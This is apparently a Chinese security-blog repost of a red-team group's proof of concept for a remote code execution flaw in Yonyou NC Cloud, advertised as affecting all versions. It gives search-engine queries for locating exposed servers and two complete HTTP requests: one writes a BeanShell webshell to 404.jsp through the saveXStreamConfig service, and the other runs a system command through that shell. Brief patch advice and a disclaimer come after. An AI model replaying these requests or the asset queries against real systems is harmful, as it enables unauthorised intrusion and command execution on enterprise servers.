用友-NC-Cloud远程代码执行漏洞(全版本通杀)PoC

admin
admin
admin
141216
文章
117
评论
2024年10月13日21:02:50评论45 views字数 2285阅读7分37秒阅读模式

 

     说句题外话,这个漏洞我们day哥在去年国护的时候就已经发现了,这来自我们团队day哥的分享,大家多关注月落安全,粉丝越多day哥的创作激情就越澎湃。本公众号会不定时分享红队实战技巧,最新漏洞利用技巧,红队好用的工具,网安界的趣闻,欢迎加入月落星沉研究室一起交流学习。
0x01漏洞介绍

    用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。

该远程代码执行漏洞可以通过特定接口上传文件,通过上传的webshell执行命令,目前全版本通杀

用友-NC-Cloud远程代码执行漏洞(全版本通杀)PoC
0x02资产测绘
FOFA:app="用友-NC-Cloud"Hunter:web.body="uap/rbac"
用友-NC-Cloud远程代码执行漏洞(全版本通杀)PoC
0x03漏洞复现
用友-NC-Cloud远程代码执行漏洞(全版本通杀)PoC

  Poc1 上传木马

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1Host: ip:portCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: cookiets=1681785470496; JSESSIONID=33989F450B1EA57D4D3ED07A343770FF.serverIf-None-Match: W/"1571-1589211696000"If-Modified-Since: Mon, 11 May 2020 15:41:36 GMTConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 247{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}

用友-NC-Cloud远程代码执行漏洞(全版本通杀)PoC

  Poc2 执行命令

POST /404.jsp?error=bsh.Interpreter HTTP/1.1Host: ip:protCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: cookiets=1681785470496; JSESSIONID=33989F450B1EA57D4D3ED07A343770FF.serverIf-None-Match: W/"1571-1589211696000"If-Modified-Since: Mon, 11 May 2020 15:41:36 GMTConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 96cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())

用友-NC-Cloud远程代码执行漏洞(全版本通杀)PoC

用友-NC-Cloud远程代码执行漏洞(全版本通杀)PoC
0x04修复建议
1.官方已经发布修复补丁,请进行升级。2.或者进行waf等安全部署拦截恶意字符

  本文由月落星沉团队编写,欢迎各位网安工程师加入月落安全研究实验室,一起学习交流讨论!群聊已满的添加Vx:linjialelovejesus,备注进群。(已加入一二三四五群的无需重复加群)

用友-NC-Cloud远程代码执行漏洞(全版本通杀)PoC

原文始发于微信公众号(月落安全):0day!!!用友-NC-Cloud远程代码执行漏洞(全版本通杀)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月13日21:02:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友-NC-Cloud远程代码执行漏洞(全版本通杀)PoChttps://cn-sec.com/archives/1893897.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息